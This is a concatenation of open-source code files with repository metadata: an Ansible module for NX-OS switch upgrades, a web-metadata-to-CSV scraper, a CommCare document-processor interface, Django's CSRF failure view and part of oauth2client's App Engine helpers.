ud[key] = {field: False}
continue
return ud
def massage_install_data(data):
# Transport cli returns a list containing one result item.
# Transport nxapi returns a list containing two items. The second item
# contains the data we are interested in.
default_error_msg = 'No install all data found'
if len(data) == 1:
result_data = data[0]
elif len(data) == 2:
result_data = data[1]
else:
result_data = default_error_msg
# Further processing may be needed for result_data
if len(data) == 2 and isinstance(data[1], dict):
if 'clierror' in data[1].keys():
result_data = data[1]['clierror']
elif 'code' in data[1].keys() and data[1]['code'] == '500':
# We encountered a backend processing error for nxapi
result_data = data[1]['msg']
else:
result_data = default_error_msg
return result_data
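# Illustrative sketch (not part of the original module): the result shapes
# massage_install_data() expects from the two transports. The literal
# values below are assumptions made up for illustration only.
#
#   cli transport   -> data = ['Compatibility check is done: ...']
#   nxapi transport -> data = [{'code': '200'}, 'Compatibility check is done: ...']
#   nxapi error     -> data = [{'code': '200'},
#                              {'code': '500', 'msg': 'Backend processing error'}]
#
# The first case returns data[0], the second data[1], the third data[1]['msg'].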
def build_install_cmd_set(issu, image, kick, type):
commands = ['terminal dont-ask']
if re.search(r'required|desired|yes', issu):
issu_cmd = 'non-disruptive'
else:
issu_cmd = ''
if type == 'impact':
rootcmd = 'show install all impact'
else:
rootcmd = 'install all'
if kick is None:
commands.append(
'%s nxos %s %s' % (rootcmd, image, issu_cmd))
else:
commands.append(
'%s system %s kickstart %s' % (rootcmd, image, kick))
return commands
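# Hedged examples of the command sets build_install_cmd_set() produces
# (the image file names are assumptions used only for illustration):
#
#   build_install_cmd_set('yes', 'nxos.7.0.3.F2.2.bin', None, 'impact')
#   -> ['terminal dont-ask',
#       'show install all impact nxos nxos.7.0.3.F2.2.bin non-disruptive']
#
#   build_install_cmd_set('no', 'n5000-sys.bin', 'n5000-kick.bin', 'install')
#   -> ['terminal dont-ask',
#       'install all system n5000-sys.bin kickstart n5000-kick.bin']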
def parse_show_version(data):
version_data = {'raw': data[0].split('\n')}
version_data['version'] = ''
version_data['error'] = False
for x in version_data['raw']:
mo = re.search(r'(kickstart|system|NXOS):\s+version\s+(\S+)', x)
if mo:
version_data['version'] = mo.group(2)
continue
if version_data['version'] == '':
version_data['error'] = True
return version_data
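# Sketch of the dictionary parse_show_version() returns (the version string
# is invented for illustration):
#
#   parse_show_version(['... NXOS: version 7.0(3)I7(1) ...'])
#   -> {'raw': [...], 'version': '7.0(3)I7(1)', 'error': False}
#
# If no kickstart/system/NXOS version line is found, 'version' stays ''
# and 'error' is set to True.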
def check_mode_legacy(module, issu, image, kick=None):
"""Some platforms/images/transports don't support the 'install all impact'
command so we need to use a different method."""
current = execute_show_command(module, 'show version', 'json')[0]
# Call parse_show_install on an empty string to create the default upgrade
# data structure dictionary
data = parse_show_install('')
upgrade_msg = 'No upgrade required'
# Process System Image
data['error'] = False
tsver = 'show version image bootflash:%s' % image
target_image = parse_show_version(execute_show_command(module, tsver))
if target_image['error']:
data['error'] = True
data['raw'] = target_image['raw']
if current['kickstart_ver_str'] != target_image['version'] and not data['error']:
data['upgrade_needed'] = True
data['disruptive'] = True
upgrade_msg = 'Switch upgraded: system: %s' % tsver
# Process Kickstart Image
if kick is not None and not data['error']:
tkver = 'show version image bootflash:%s' % kick
target_kick = parse_show_version(execute_show_command(module, tkver))
if target_kick['error']:
data['error'] = True
data['raw'] = target_kick['raw']
if current['kickstart_ver_str'] != target_kick['version'] and not data['error']:
data['upgrade_needed'] = True
data['disruptive'] = True
upgrade_msg = upgrade_msg + ' kickstart: %s' % tkver
data['processed'] = upgrade_msg
return data
def check_mode_nextgen(module, issu, image, kick=None):
"""Use the 'install all impact' command for check_mode"""
opts = {'ignore_timeout': True}
commands = build_install_cmd_set(issu, image, kick, 'impact')
data = parse_show_install(load_config(module, commands, True, opts))
# If an error is encountered when issu is 'desired' then try again
# but set issu to 'no'
if data['error'] and issu == 'desired':
issu = 'no'
commands = build_install_cmd_set(issu, image, kick, 'impact')
# The system may be busy from the previous call to check_mode so loop
# until it's done.
data = check_install_in_progress(module, commands, opts)
if data['server_error']:
data['error'] = True
return data
def check_install_in_progress(module, commands, opts):
for attempt in range(20):
data = parse_show_install(load_config(module, commands, True, opts))
if data['install_in_progress']:
sleep(1)
continue
break
return data
def check_mode(module, issu, image, kick=None):
"""Check switch upgrade impact using 'show install all impact' command"""
data = check_mode_nextgen(module, issu, image, kick)
if data['server_error']:
# We encountered an unrecoverable error in the attempt to get upgrade
# impact data from the 'show install all impact' command.
# Fallback to legacy method.
data = check_mode_legacy(module, issu, image, kick)
return data
def do_install_all(module, issu, image, kick=None):
"""Perform the switch upgrade using the 'install all' command"""
impact_data = check_mode(module, issu, image, kick)
if module.check_mode:
# Check mode set in the playbook so just return the impact data.
msg = '*** SWITCH WAS NOT UPGRADED: IMPACT DATA ONLY ***'
impact_data['processed'].append(msg)
return impact_data
if impact_data['error']:
# Check mode discovered an error so return with this info.
return impact_data
elif not impact_data['upgrade_needed']:
# The switch is already upgraded. Nothing more to do.
return impact_data
else:
# If we get here, check_mode returned no errors and the switch
# needs to be upgraded.
if impact_data['disruptive']:
# Check mode indicated that ISSU is not possible so issue the
# upgrade command without the non-disruptive flag.
issu = 'no'
commands = build_install_cmd_set(issu, image, kick, 'install')
opts = {'ignore_timeout': True}
# The system may be busy from the call to check_mode so loop until
# it's done.
upgrade = check_install_in_progress(module, commands, opts)
# Special case: If we encounter a server error at this stage
# it means the command was sent and the upgrade was started but
# we will need to use the impact data instead of the current install
# data.
if upgrade['server_error']:
upgrade['upgrade_succeeded'] = True
upgrade['use_impact_data'] = True
if upgrade['use_impact_data']:
if upgrade['upgrade_succeeded']:
upgrade = impact_data
upgrade['upgrade_succeeded'] = True
else:
upgrade = impact_data
upgrade['upgrade_succeeded'] = False
if not upgrade['upgrade_succeeded']:
upgrade['error'] = True
return upgrade
def main():
argument_spec = dict(
system_image_file=dict(required=True),
kickstart_image_file=dict(required=False),
issu=dict(choices=['required', 'desired', 'no', 'yes'], default='no'),
)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
# This module will error out if the Ansible task timeout value is not
# tuned high enough.
check_ansible_timer(module)
# Get system_image_file(sif), kickstart_image_file(kif) and
# issu settings from module params.
sif = module.params['system_image_file']
kif = module.params['kickstart_image_file']
issu = module.params['issu']
if kif == 'null' or kif == '':
kif = None
install_result = do_install_all(module, issu, sif, kick=kif)
if install_result['error']:
msg = "Failed to upgrade device using image "
if kif:
msg = msg + "files: kickstart: %s, system: %s" % (kif, sif)
else:
msg = msg + "file: system: %s" % sif
module.fail_json(msg=msg, raw_data=install_result['list_data'])
state = install_result['processed']
changed = install_result['upgrade_needed']
module.exit_json(changed=changed, install_state=state, warnings=warnings)
if __name__ == '__main__':
main()
|
gpl-3.0
|
m-rakowski/html-to-csv
|
app/extract.py
|
1
|
2373
|
# -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
import requests
import csv
import re
class Extraction():
def has_class(self,tag):
return tag.has_attr('class')
def get_info_dict(self,url):
r = requests.get(url)
r.encoding = 'utf-8'
data = r.text
soup = BeautifulSoup(data, "html.parser")
info_dict = {'url' : '',
'title' : '',
'author' : '',
'description' : '',
'charset' : '',
'lang' : ''
}
info_dict['url']= url
title_object = soup.find("title")
if title_object is not None:
info_dict['title'] = title_object.string.encode('utf-8')
author_object = soup.find("meta",{"name" : "author"})
if author_object is not None:
info_dict['author'] = author_object['content'].encode('utf-8')
description_object = soup.find("meta",{"name" : "description"})
if description_object is not None:
info_dict['description'] = description_object['content'].encode('utf-8')
charset_object = soup.find("meta", charset = re.compile('\d'))
if charset_object is not None:
info_dict['charset'] = charset_object['charset'].encode('utf-8')
lang_object = soup.find("html", lang = re.compile('\d'))
if lang_object is not None:
info_dict['lang'] = lang_object['lang'].encode('utf-8')
return info_dict
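# Illustrative sketch (not part of the original class): the dict shape that
# get_info_dict() returns. The URL and field values below are assumptions.
#
#   Extraction().get_info_dict('http://example.com')
#   -> {'url': 'http://example.com', 'title': 'Example Domain',
#       'author': '', 'description': '', 'charset': '', 'lang': ''}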
def run(self,urls):
urls = [ url.strip() for url in urls.strip().splitlines() if url]
print(urls)
with open('app/static/sites_metadata.csv', 'w') as csvfile:
fieldnames = ['url', 'title', 'author', 'description', 'charset', 'lang']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames, dialect='excel')
writer.writeheader()
for url in urls:
url='http://'+url if not url[:4].lower() == 'http' else url
row = self.get_info_dict(url)
print("ROW: ",row)
writer.writerow(row)
print("Data extraction successful.")
|
bsd-3-clause
|
qedsoftware/commcare-hq
|
corehq/util/doc_processor/interface.py
|
1
|
11487
|
import weakref
from abc import ABCMeta, abstractmethod
from datetime import datetime
import six
from corehq.util.pagination import PaginationEventHandler, TooManyRetries
class BulkProcessingFailed(Exception):
pass
DOCS_SKIPPED_WARNING = """
WARNING {} documents were not processed due to concurrent modification
during migration. Run the migration again until you do not see this
message.
"""
class BaseDocProcessor(six.with_metaclass(ABCMeta)):
"""Base class for processors that get passed"""
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def process_doc(self, doc):
"""Process a single document
:param doc: The document dict to be processed.
:returns: True if doc was processed successfully else False. If this returns False
the document migration will be retried later.
"""
raise NotImplementedError
def process_bulk_docs(self, docs):
"""Process a batch of documents. The default implementation passes
each doc in turn to ``process_doc``.
:param docs: A list of document dicts to be processed.
:returns: True if doc was processed successfully else False.
If this returns False the processing will be halted.
"""
return all(self.process_doc(doc) for doc in docs)
def handle_skip(self, doc):
"""Called when a document is going to be skipped i.e. it has been
retried > max_retries.
:returns: True to indicate that the skip has been handled
or False to stop execution
"""
return False
def processing_complete(self, skipped):
pass
def should_process(self, doc):
"""
:param doc: the document to filter
:return: True if this doc should be migrated
"""
return True
class ProcessorProgressLogger(object):
def progress_starting(self, total, previously_visited):
print("Processing {} documents{}: ...".format(
total,
" (~{} already processed)".format(previously_visited) if previously_visited else ""
))
def document_skipped(self, doc_dict):
print("Skip: {doc_type} {_id}".format(**doc_dict))
def progress(self, processed, visited, total, time_elapsed, time_remaining):
print("Processed {}/{} of {} documents in {} ({} remaining)"
.format(processed, visited, total, time_elapsed, time_remaining))
def progress_complete(self, processed, visited, total, previously_visited, filtered):
print("Processed {}/{} of {} documents ({} previously processed, {} filtered out).".format(
processed,
visited,
total,
previously_visited,
filtered
))
class DocumentProvider(six.with_metaclass(ABCMeta)):
@abstractmethod
def get_document_iterator(self, chunk_size, event_handler=None):
"""
:param chunk_size: Maximum number of records to read from the database at one time
:param event_handler: instance of ``PaginateViewLogHandler`` to be notified of view events.
:return: an instance of ``ResumableFunctionIterator``
"""
raise NotImplementedError
@abstractmethod
def get_total_document_count(self):
"""
:return: the total count of documents expected
"""
raise NotImplementedError
class DocumentProcessorController(object):
"""Process Docs
:param document_provider: A ``DocumentProvider`` object
:param doc_processor: A ``BaseDocProcessor`` object used to process documents.
:param reset: Reset existing processor state (if any), causing all
documents to be reconsidered for processing, if this is true.
:param max_retry: Number of times to retry processing a document before giving up.
:param chunk_size: Maximum number of records to read from couch at
one time. It may be necessary to use a smaller chunk size if the
records being processed are very large and the default chunk size of
100 would exceed available memory.
:param event_handler: A ``PaginateViewLogHandler`` object to be notified of pagination events.
:param progress_logger: A ``ProcessorProgressLogger`` object to notify of progress events.
"""
def __init__(self, document_provider, doc_processor, reset=False, max_retry=2,
chunk_size=100, event_handler=None, progress_logger=None):
self.doc_processor = doc_processor
self.reset = reset
self.max_retry = max_retry
self.chunk_size = chunk_size
self.progress_logger = progress_logger or ProcessorProgressLogger()
self.document_provider = document_provider
self.document_iterator = self.document_provider.get_document_iterator(chunk_size, event_handler)
self.visited = 0
self.previously_visited = 0
self.total = 0
self.processed = 0
self.skipped = 0
self.start = None
def has_started(self):
return bool(self.document_iterator.get_iterator_detail('progress'))
@property
def session_visited(self):
return self.visited - self.previously_visited
@property
def session_total(self):
return self.total - self.previously_visited
@property
def attempted(self):
return self.processed + self.skipped
@property
def timing(self):
"""Returns a tuple of (elapsed, remaining)"""
elapsed = datetime.now() - self.start
if self.session_visited > self.session_total:
remaining = "?"
else:
session_remaining = self.session_total - self.session_visited
remaining = elapsed / self.session_visited * session_remaining
return elapsed, remaining
def _setup(self):
self.total = self.document_provider.get_total_document_count()
if self.reset:
self.document_iterator.discard_state()
elif self.document_iterator.get_iterator_detail('progress'):
info = self.document_iterator.get_iterator_detail('progress')
old_total = info["total"]
# Estimate already visited based on difference of old/new
# totals. The theory is that new or deleted records will be
# evenly distributed across the entire set.
self.visited = int(round(float(self.total) / old_total * info["visited"]))
self.previously_visited = self.visited
self.progress_logger.progress_starting(self.total, self.previously_visited)
self.start = datetime.now()
def run(self):
"""
:returns: A tuple `(<num processed>, <num skipped>)`
"""
self._setup()
with self.doc_processor:
for doc in self.document_iterator:
self._process_doc(doc)
self._update_progress()
self._processing_complete()
return self.processed, self.skipped
def _process_doc(self, doc):
if not self.doc_processor.should_process(doc):
return
ok = self.doc_processor.process_doc(doc)
if ok:
self.processed += 1
else:
try:
self.document_iterator.retry(doc['_id'], self.max_retry)
except TooManyRetries:
if not self.doc_processor.handle_skip(doc):
raise
else:
self.progress_logger.document_skipped(doc)
self.skipped += 1
def _update_progress(self):
self.visited += 1
if self.visited % self.chunk_size == 0:
self.document_iterator.set_iterator_detail('progress', {"visited": self.visited, "total": self.total})
if self.attempted % self.chunk_size == 0:
elapsed, remaining = self.timing
self.progress_logger.progress(
self.processed, self.visited, self.total, elapsed, remaining
)
def _processing_complete(self):
if self.session_visited:
self.document_iterator.set_iterator_detail('progress', {"visited": self.visited, "total": self.total})
self.doc_processor.processing_complete(self.skipped)
self.progress_logger.progress_complete(
self.processed,
self.visited,
self.total,
self.previously_visited,
self.session_visited - self.attempted
)
if self.skipped:
print(DOCS_SKIPPED_WARNING.format(self.skipped))
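# Minimal usage sketch. MyProvider and MyProcessor are hypothetical
# subclasses of DocumentProvider and BaseDocProcessor defined elsewhere;
# they are not part of this module.
#
#   processor = DocumentProcessorController(
#       MyProvider(), MyProcessor(), reset=False, chunk_size=100)
#   processed, skipped = processor.run()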
class BulkDocProcessorEventHandler(PaginationEventHandler):
def __init__(self, processor):
self.processor_ref = weakref.ref(processor)
def page_end(self, total_emitted, duration, *args, **kwargs):
processor = self.processor_ref()
if processor:
processor.process_chunk()
else:
raise BulkProcessingFailed("Processor has gone away")
class BulkDocProcessor(DocumentProcessorController):
"""Process docs in batches
The bulk doc processor will send a batch of documents to the document
processor. If the processor does not respond with True then
the iteration is halted. Restarting the iteration will start by
re-sending the previous chunk to the processor.
The size of the batches passed to the document processor may vary
depending on how they are being filtered by the
document processor but will never exceed ``chunk_size``.
:param document_provider: A ``DocumentProvider`` object
:param doc_processor: A ``BaseDocProcessor`` object used to process documents.
:param reset: Reset existing processor state (if any), causing all
documents to be reconsidered for processing, if this is true.
:param max_retry: Number of times to retry processing a document before giving up.
:param chunk_size: Maximum number of records to read from couch at
one time. It may be necessary to use a smaller chunk size if the
records being processed are very large and the default chunk size of
100 would exceed available memory.
:param progress_logger: A ``ProcessorProgressLogger`` object to notify of progress events.
"""
def __init__(self, document_provider, doc_processor, reset=False, max_retry=2,
chunk_size=100, progress_logger=None):
event_handler = BulkDocProcessorEventHandler(self)
super(BulkDocProcessor, self).__init__(
document_provider, doc_processor, reset, max_retry, chunk_size,
event_handler, progress_logger
)
self.changes = []
def _process_doc(self, doc):
if self.doc_processor.should_process(doc):
self.changes.append(doc)
def process_chunk(self):
"""Called by the BulkDocProcessorLogHandler"""
ok = self.doc_processor.process_bulk_docs(self.changes)
if ok:
self.processed += len(self.changes)
self.changes = []
else:
raise BulkProcessingFailed("Processing batch failed")
def _update_progress(self):
self.visited += 1
if self.visited % self.chunk_size == 0:
self.document_iterator.set_iterator_detail('progress', {"visited": self.visited, "total": self.total})
elapsed, remaining = self.timing
self.progress_logger.progress(
self.processed, self.visited, self.total, elapsed, remaining
)
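# Sketch of how BulkDocProcessor is typically wired (same hypothetical
# provider/processor names as above): documents accumulate in self.changes
# and are flushed in batches by process_chunk(), which the pagination event
# handler invokes at each page end.
#
#   bulk = BulkDocProcessor(MyProvider(), MyProcessor(), chunk_size=100)
#   processed, skipped = bulk.run()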
|
bsd-3-clause
|
rooshilp/CMPUT410Lab6
|
virt_env/virt1/lib/python2.7/site-packages/django/views/csrf.py
|
107
|
4958
|
from django.conf import settings
from django.http import HttpResponseForbidden
from django.template import Context, Template
from django.utils.translation import ugettext as _
# We include the template inline since we need to be able to reliably display
# this error message, especially for the sake of developers, and there isn't any
# other way of making it available independent of what is in the settings file.
# Only the text appearing with DEBUG=False is translated. Normal translation
# tags cannot be used with this inline templates as makemessages would not be
# able to discover the strings.
CSRF_FAILURE_TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta name="robots" content="NONE,NOARCHIVE">
<title>403 Forbidden</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
#info { background:#f6f6f6; }
#info ul { margin: 0.5em 4em; }
#info p, #summary p { padding-top:10px; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>{{ title }} <span>(403)</span></h1>
<p>{{ main }}</p>
{% if no_referer %}
<p>{{ no_referer1 }}</p>
<p>{{ no_referer2 }}</p>
{% endif %}
{% if no_cookie %}
<p>{{ no_cookie1 }}</p>
<p>{{ no_cookie2 }}</p>
{% endif %}
</div>
{% if DEBUG %}
<div id="info">
<h2>Help</h2>
{% if reason %}
<p>Reason given for failure:</p>
<pre>
{{ reason }}
</pre>
{% endif %}
<p>In general, this can occur when there is a genuine Cross Site Request Forgery, or when
<a
href='http://docs.djangoproject.com/en/dev/ref/contrib/csrf/#ref-contrib-csrf'>Django's
CSRF mechanism</a> has not been used correctly. For POST forms, you need to
ensure:</p>
<ul>
<li>Your browser is accepting cookies.</li>
<li>The view function uses <a
href='http://docs.djangoproject.com/en/dev/ref/templates/api/#subclassing-context-requestcontext'><code>RequestContext</code></a>
for the template, instead of <code>Context</code>.</li>
<li>In the template, there is a <code>{% templatetag openblock %} csrf_token
{% templatetag closeblock %}</code> template tag inside each POST form that
targets an internal URL.</li>
<li>If you are not using <code>CsrfViewMiddleware</code>, then you must use
<code>csrf_protect</code> on any views that use the <code>csrf_token</code>
template tag, as well as those that accept the POST data.</li>
</ul>
<p>You're seeing the help section of this page because you have <code>DEBUG =
True</code> in your Django settings file. Change that to <code>False</code>,
and only the initial error message will be displayed. </p>
<p>You can customize this page using the CSRF_FAILURE_VIEW setting.</p>
</div>
{% else %}
<div id="explanation">
<p><small>{{ more }}</small></p>
</div>
{% endif %}
</body>
</html>
"""
def csrf_failure(request, reason=""):
"""
Default view used when request fails CSRF protection
"""
from django.middleware.csrf import REASON_NO_REFERER, REASON_NO_CSRF_COOKIE
t = Template(CSRF_FAILURE_TEMPLATE)
c = Context({
'title': _("Forbidden"),
'main': _("CSRF verification failed. Request aborted."),
'reason': reason,
'no_referer': reason == REASON_NO_REFERER,
'no_referer1': _(
"You are seeing this message because this HTTPS site requires a "
"'Referer header' to be sent by your Web browser, but none was "
"sent. This header is required for security reasons, to ensure "
"that your browser is not being hijacked by third parties."),
'no_referer2': _(
"If you have configured your browser to disable 'Referer' headers, "
"please re-enable them, at least for this site, or for HTTPS "
"connections, or for 'same-origin' requests."),
'no_cookie': reason == REASON_NO_CSRF_COOKIE,
'no_cookie1': _(
"You are seeing this message because this site requires a CSRF "
"cookie when submitting forms. This cookie is required for "
"security reasons, to ensure that your browser is not being "
"hijacked by third parties."),
'no_cookie2': _(
"If you have configured your browser to disable cookies, please "
"re-enable them, at least for this site, or for 'same-origin' "
"requests."),
'DEBUG': settings.DEBUG,
'more': _("More information is available with DEBUG=True."),
})
return HttpResponseForbidden(t.render(c), content_type='text/html')
|
apache-2.0
|
googleglass/mirror-catfacts-python
|
libs/oauth2client/appengine.py
|
154
|
32524
|
# Copyright (C) 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for Google App Engine
Utilities for making it easier to use OAuth 2.0 on Google App Engine.
"""
__author__ = '[email protected] (Joe Gregorio)'
import base64
import cgi
import httplib2
import logging
import os
import pickle
import threading
import time
from google.appengine.api import app_identity
from google.appengine.api import memcache
from google.appengine.api import users
from google.appengine.ext import db
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import login_required
from google.appengine.ext.webapp.util import run_wsgi_app
from oauth2client import GOOGLE_AUTH_URI
from oauth2client import GOOGLE_REVOKE_URI
from oauth2client import GOOGLE_TOKEN_URI
from oauth2client import clientsecrets
from oauth2client import util
from oauth2client import xsrfutil
from oauth2client.anyjson import simplejson
from oauth2client.client import AccessTokenRefreshError
from oauth2client.client import AssertionCredentials
from oauth2client.client import Credentials
from oauth2client.client import Flow
from oauth2client.client import OAuth2WebServerFlow
from oauth2client.client import Storage
# TODO(dhermes): Resolve import issue.
# This is a temporary fix for a Google internal issue.
try:
from google.appengine.ext import ndb
except ImportError:
ndb = None
logger = logging.getLogger(__name__)
OAUTH2CLIENT_NAMESPACE = 'oauth2client#ns'
XSRF_MEMCACHE_ID = 'xsrf_secret_key'
def _safe_html(s):
"""Escape text to make it safe to display.
Args:
s: string, The text to escape.
Returns:
The escaped text as a string.
"""
return cgi.escape(s, quote=1).replace("'", '&#39;')
class InvalidClientSecretsError(Exception):
"""The client_secrets.json file is malformed or missing required fields."""
class InvalidXsrfTokenError(Exception):
"""The XSRF token is invalid or expired."""
class SiteXsrfSecretKey(db.Model):
"""Storage for the sites XSRF secret key.
There will only be one instance stored of this model, the one used for the
site.
"""
secret = db.StringProperty()
if ndb is not None:
class SiteXsrfSecretKeyNDB(ndb.Model):
"""NDB Model for storage for the sites XSRF secret key.
Since this model uses the same kind as SiteXsrfSecretKey, it can be used
interchangeably. This simply provides an NDB model for interacting with the
same data the DB model interacts with.
There should only be one instance stored of this model, the one used for the
site.
"""
secret = ndb.StringProperty()
@classmethod
def _get_kind(cls):
"""Return the kind name for this class."""
return 'SiteXsrfSecretKey'
def _generate_new_xsrf_secret_key():
"""Returns a random XSRF secret key.
"""
return os.urandom(16).encode("hex")
def xsrf_secret_key():
"""Return the secret key for use for XSRF protection.
If the Site entity does not have a secret key, this method will also create
one and persist it.
Returns:
The secret key.
"""
secret = memcache.get(XSRF_MEMCACHE_ID, namespace=OAUTH2CLIENT_NAMESPACE)
if not secret:
# Load the one and only instance of SiteXsrfSecretKey.
model = SiteXsrfSecretKey.get_or_insert(key_name='site')
if not model.secret:
model.secret = _generate_new_xsrf_secret_key()
model.put()
secret = model.secret
memcache.add(XSRF_MEMCACHE_ID, secret, namespace=OAUTH2CLIENT_NAMESPACE)
return str(secret)
class AppAssertionCredentials(AssertionCredentials):
"""Credentials object for App Engine Assertion Grants
This object will allow an App Engine application to identify itself to Google
and other OAuth 2.0 servers that can verify assertions. It can be used for the
purpose of accessing data stored under an account assigned to the App Engine
application itself.
This credential does not require a flow to instantiate because it represents
a two legged flow, and therefore has all of the required information to
generate and refresh its own access tokens.
"""
@util.positional(2)
def __init__(self, scope, **kwargs):
"""Constructor for AppAssertionCredentials
Args:
scope: string or iterable of strings, scope(s) of the credentials being
requested.
"""
self.scope = util.scopes_to_string(scope)
# Assertion type is no longer used, but still in the parent class signature.
super(AppAssertionCredentials, self).__init__(None)
@classmethod
def from_json(cls, json):
data = simplejson.loads(json)
return AppAssertionCredentials(data['scope'])
def _refresh(self, http_request):
"""Refreshes the access_token.
Since the underlying App Engine app_identity implementation does its own
caching we can skip all the storage hoops and just to a refresh using the
API.
Args:
http_request: callable, a callable that matches the method signature of
httplib2.Http.request, used to make the refresh request.
Raises:
AccessTokenRefreshError: When the refresh fails.
"""
try:
scopes = self.scope.split()
(token, _) = app_identity.get_access_token(scopes)
except app_identity.Error, e:
raise AccessTokenRefreshError(str(e))
self.access_token = token
class FlowProperty(db.Property):
"""App Engine datastore Property for Flow.
Utility property that allows easy storage and retrieval of an
oauth2client.Flow"""
# Tell what the user type is.
data_type = Flow
# For writing to datastore.
def get_value_for_datastore(self, model_instance):
flow = super(FlowProperty,
self).get_value_for_datastore(model_instance)
return db.Blob(pickle.dumps(flow))
# For reading from datastore.
def make_value_from_datastore(self, value):
if value is None:
return None
return pickle.loads(value)
def validate(self, value):
if value is not None and not isinstance(value, Flow):
raise db.BadValueError('Property %s must be convertible '
'to a FlowThreeLegged instance (%s)' %
(self.name, value))
return super(FlowProperty, self).validate(value)
def empty(self, value):
return not value
if ndb is not None:
class FlowNDBProperty(ndb.PickleProperty):
"""App Engine NDB datastore Property for Flow.
Serves the same purpose as the DB FlowProperty, but for NDB models. Since
PickleProperty inherits from BlobProperty, the underlying representation of
the data in the datastore will be the same as in the DB case.
Utility property that allows easy storage and retrieval of an
oauth2client.Flow
"""
def _validate(self, value):
"""Validates a value as a proper Flow object.
Args:
value: A value to be set on the property.
Raises:
TypeError if the value is not an instance of Flow.
"""
logger.info('validate: Got type %s', type(value))
if value is not None and not isinstance(value, Flow):
raise TypeError('Property %s must be convertible to a flow '
'instance; received: %s.' % (self._name, value))
class CredentialsProperty(db.Property):
"""App Engine datastore Property for Credentials.
Utility property that allows easy storage and retrieval of
oath2client.Credentials
"""
# Tell what the user type is.
data_type = Credentials
# For writing to datastore.
def get_value_for_datastore(self, model_instance):
logger.info("get: Got type " + str(type(model_instance)))
cred = super(CredentialsProperty,
self).get_value_for_datastore(model_instance)
if cred is None:
cred = ''
else:
cred = cred.to_json()
return db.Blob(cred)
# For reading from datastore.
def make_value_from_datastore(self, value):
logger.info("make: Got type " + str(type(value)))
if value is None:
return None
if len(value) == 0:
return None
try:
credentials = Credentials.new_from_json(value)
except ValueError:
credentials = None
return credentials
def validate(self, value):
value = super(CredentialsProperty, self).validate(value)
logger.info("validate: Got type " + str(type(value)))
if value is not None and not isinstance(value, Credentials):
raise db.BadValueError('Property %s must be convertible '
'to a Credentials instance (%s)' %
(self.name, value))
#if value is not None and not isinstance(value, Credentials):
# return None
return value
if ndb is not None:
# TODO(dhermes): Turn this into a JsonProperty and overhaul the Credentials
# and subclass mechanics to use new_from_dict, to_dict,
# from_dict, etc.
class CredentialsNDBProperty(ndb.BlobProperty):
"""App Engine NDB datastore Property for Credentials.
Serves the same purpose as the DB CredentialsProperty, but for NDB models.
Since CredentialsProperty stores data as a blob and this inherits from
BlobProperty, the data in the datastore will be the same as in the DB case.
Utility property that allows easy storage and retrieval of Credentials and
subclasses.
"""
def _validate(self, value):
"""Validates a value as a proper credentials object.
Args:
value: A value to be set on the property.
Raises:
TypeError if the value is not an instance of Credentials.
"""
logger.info('validate: Got type %s', type(value))
if value is not None and not isinstance(value, Credentials):
raise TypeError('Property %s must be convertible to a credentials '
'instance; received: %s.' % (self._name, value))
def _to_base_type(self, value):
"""Converts our validated value to a JSON serialized string.
Args:
value: A value to be set in the datastore.
Returns:
A JSON serialized version of the credential, else '' if value is None.
"""
if value is None:
return ''
else:
return value.to_json()
def _from_base_type(self, value):
"""Converts our stored JSON string back to the desired type.
Args:
value: A value from the datastore to be converted to the desired type.
Returns:
A deserialized Credentials (or subclass) object, else None if the
value can't be parsed.
"""
if not value:
return None
try:
# Uses the from_json method of the implied class of value
credentials = Credentials.new_from_json(value)
except ValueError:
credentials = None
return credentials
class StorageByKeyName(Storage):
"""Store and retrieve a credential to and from the App Engine datastore.
This Storage helper presumes the Credentials have been stored as a
CredentialsProperty or CredentialsNDBProperty on a datastore model class, and
that entities are stored by key_name.
"""
@util.positional(4)
def __init__(self, model, key_name, property_name, cache=None, user=None):
"""Constructor for Storage.
Args:
model: db.Model or ndb.Model, model class
key_name: string, key name for the entity that has the credentials
property_name: string, name of the property that is a CredentialsProperty
or CredentialsNDBProperty.
cache: memcache, a write-through cache to put in front of the datastore.
If the model you are using is an NDB model, using a cache will be
redundant since the model uses an instance cache and memcache for you.
user: users.User object, optional. Can be used to grab user ID as a
key_name if no key name is specified.
"""
if key_name is None:
if user is None:
raise ValueError('StorageByKeyName called with no key name or user.')
key_name = user.user_id()
self._model = model
self._key_name = key_name
self._property_name = property_name
self._cache = cache
def _is_ndb(self):
"""Determine whether the model of the instance is an NDB model.
Returns:
Boolean indicating whether or not the model is an NDB or DB model.
"""
# issubclass will fail if one of the arguments is not a class, only need
# worry about new-style classes since ndb and db models are new-style
if isinstance(self._model, type):
if ndb is not None and issubclass(self._model, ndb.Model):
return True
elif issubclass(self._model, db.Model):
return False
raise TypeError('Model class not an NDB or DB model: %s.' % (self._model,))
def _get_entity(self):
"""Retrieve entity from datastore.
Uses a different model method for db or ndb models.
Returns:
Instance of the model corresponding to the current storage object
and stored using the key name of the storage object.
"""
if self._is_ndb():
return self._model.get_by_id(self._key_name)
else:
return self._model.get_by_key_name(self._key_name)
def _delete_entity(self):
"""Delete entity from datastore.
Attempts to delete using the key_name stored on the object, whether or not
the given key is in the datastore.
"""
if self._is_ndb():
ndb.Key(self._model, self._key_name).delete()
else:
entity_key = db.Key.from_path(self._model.kind(), self._key_name)
db.delete(entity_key)
def locked_get(self):
